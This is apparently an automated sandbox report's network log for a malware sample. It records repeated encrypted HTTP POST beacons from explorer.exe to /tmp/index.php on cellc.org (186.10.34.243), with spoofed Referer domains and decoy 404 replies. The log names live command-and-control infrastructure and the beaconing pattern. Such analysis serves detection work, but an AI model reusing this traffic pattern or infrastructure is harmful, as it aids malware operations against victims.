                                                                                                                                                                                        • khjhprifrxebx.net
                                                                                                                                                                                        • yyyjoidqibgvbs.net
                                                                                                                                                                                        • jyvmasmiydvgjuu.org
                                                                                                                                                                                        • qkoxdyhgicus.org
                                                                                                                                                                                        • wsacracxaao.com
                                                                                                                                                                                        • dhdnvpjjjnb.com
                                                                                                                                                                                        • hberlqlxvspxm.com
                                                                                                                                                                                        • ndsmsdugaunva.net
                                                                                                                                                                                        • kxgtxppvhlmsi.net
                                                                                                                                                                                        • dgqkmisxnbbni.net
                                                                                                                                                                                        • uwgftqaxwugurgs.com
                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        0192.168.2.449744186.10.34.243802580C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        May 2, 2024 20:49:25.562995911 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://ynwsxoervaie.org/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 198
                                                                                                                                                                                        Host: cellc.org
                                                                                                                                                                                        May 2, 2024 20:49:25.563019991 CEST198OUTData Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 57 58 bb ea
                                                                                                                                                                                        Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA .[k,vuWXVivsuxZH2zvR!XjoN]D}_V5vs(8$y:HQ(b`AMJ
                                                                                                                                                                                        May 2, 2024 20:49:26.257427931 CEST178INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Server: nginx/1.26.0
                                                                                                                                                                                        Date: Thu, 02 May 2024 18:49:26 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                        Data Raw: 04 00 00 00 72 e8 85 ed
                                                                                                                                                                                        Data Ascii: r


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        1192.168.2.449745186.10.34.243802580C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        May 2, 2024 20:49:26.484536886 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://khjhprifrxebx.net/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 113
                                                                                                                                                                                        Host: cellc.org
                                                                                                                                                                                        May 2, 2024 20:49:26.484560013 CEST113OUTData Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 39 34 aa f8
                                                                                                                                                                                        Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu94LMzL[kU2u'
                                                                                                                                                                                        May 2, 2024 20:49:27.180330038 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Server: nginx/1.26.0
                                                                                                                                                                                        Date: Thu, 02 May 2024 18:49:26 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        2192.168.2.449746186.10.34.243802580C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        May 2, 2024 20:49:27.548347950 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://yyyjoidqibgvbs.net/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 254
                                                                                                                                                                                        Host: cellc.org
                                                                                                                                                                                        May 2, 2024 20:49:27.548413992 CEST254OUTData Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 7d 2c a2 92
                                                                                                                                                                                        Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu},W\aP9i =kwH[3x#B3~?7Un6AeF/}F$vy'<UMb {Yz.(g<|IcZ<A
                                                                                                                                                                                        May 2, 2024 20:49:28.469897985 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Server: nginx/1.26.0
                                                                                                                                                                                        Date: Thu, 02 May 2024 18:49:28 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        3192.168.2.449747186.10.34.243802580C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        May 2, 2024 20:49:29.611454010 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://jyvmasmiydvgjuu.org/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 117
                                                                                                                                                                                        Host: cellc.org
                                                                                                                                                                                        May 2, 2024 20:49:29.611469030 CEST117OUTData Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 2d 52 d6 8c
                                                                                                                                                                                        Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu-RA]Xbb{0Qu{7q
                                                                                                                                                                                        May 2, 2024 20:49:30.304878950 CEST163INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.26.0
                                                                                                                                                                                        Date: Thu, 02 May 2024 18:49:30 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        X-Powered-By: PHP/7.4.33


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        4192.168.2.449748186.10.34.243802580C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        May 2, 2024 20:49:30.529067993 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://qkoxdyhgicus.org/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 176
                                                                                                                                                                                        Host: cellc.org
                                                                                                                                                                                        May 2, 2024 20:49:30.529092073 CEST176OUTData Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 2e 1f d5 ed
                                                                                                                                                                                        Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu.!Y[Ns)EGd|ik2&\AO'#%!t?="O/]OH
                                                                                                                                                                                        May 2, 2024 20:49:31.224658966 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Server: nginx/1.26.0
                                                                                                                                                                                        Date: Thu, 02 May 2024 18:49:30 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        5192.168.2.449749186.10.34.243802580C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        May 2, 2024 20:49:31.455151081 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://wsacracxaao.com/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 235
                                                                                                                                                                                        Host: cellc.org
                                                                                                                                                                                        May 2, 2024 20:49:31.455168009 CEST235OUTData Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 5c 2b ce b9
                                                                                                                                                                                        Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu\+hWLa\R%--ybA`v6@J[&F;NK1 2)o$SgX G:Y[?w6s~(@dbtyN
                                                                                                                                                                                        May 2, 2024 20:49:32.375453949 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Server: nginx/1.26.0
                                                                                                                                                                                        Date: Thu, 02 May 2024 18:49:32 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        6192.168.2.449750186.10.34.243802580C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        May 2, 2024 20:49:33.652087927 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://dhdnvpjjjnb.com/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 125
                                                                                                                                                                                        Host: cellc.org
                                                                                                                                                                                        May 2, 2024 20:49:33.652129889 CEST125OUTData Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 55 5d c7 9b
                                                                                                                                                                                        Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vuU]0@Xk,z\\JnM03
                                                                                                                                                                                        May 2, 2024 20:49:34.573210001 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Server: nginx/1.26.0
                                                                                                                                                                                        Date: Thu, 02 May 2024 18:49:34 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        7192.168.2.449751186.10.34.243802580C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        May 2, 2024 20:49:34.799211979 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://hberlqlxvspxm.com/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 314
                                                                                                                                                                                        Host: cellc.org
                                                                                                                                                                                        May 2, 2024 20:49:34.799297094 CEST314OUTData Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 2d 49 a2 b8
                                                                                                                                                                                        Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu-IMSJ|a]Otca_KEryS9UGtG-!L]U,)q0&IgNkOfU+a?,G1wc0
                                                                                                                                                                                        May 2, 2024 20:49:35.490858078 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Server: nginx/1.26.0
                                                                                                                                                                                        Date: Thu, 02 May 2024 18:49:35 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        8192.168.2.449752186.10.34.243802580C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        May 2, 2024 20:49:35.713702917 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://ndsmsdugaunva.net/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 260
                                                                                                                                                                                        Host: cellc.org
                                                                                                                                                                                        May 2, 2024 20:49:35.713702917 CEST260OUTData Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 35 0d b9 bc
                                                                                                                                                                                        Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu5a]eqDdUK Q]5;o1K,)-z<#b9C]"YP=NuE.uHI_|yJjMSV9zD,PKd
                                                                                                                                                                                        May 2, 2024 20:49:36.407660007 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Server: nginx/1.26.0
                                                                                                                                                                                        Date: Thu, 02 May 2024 18:49:36 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
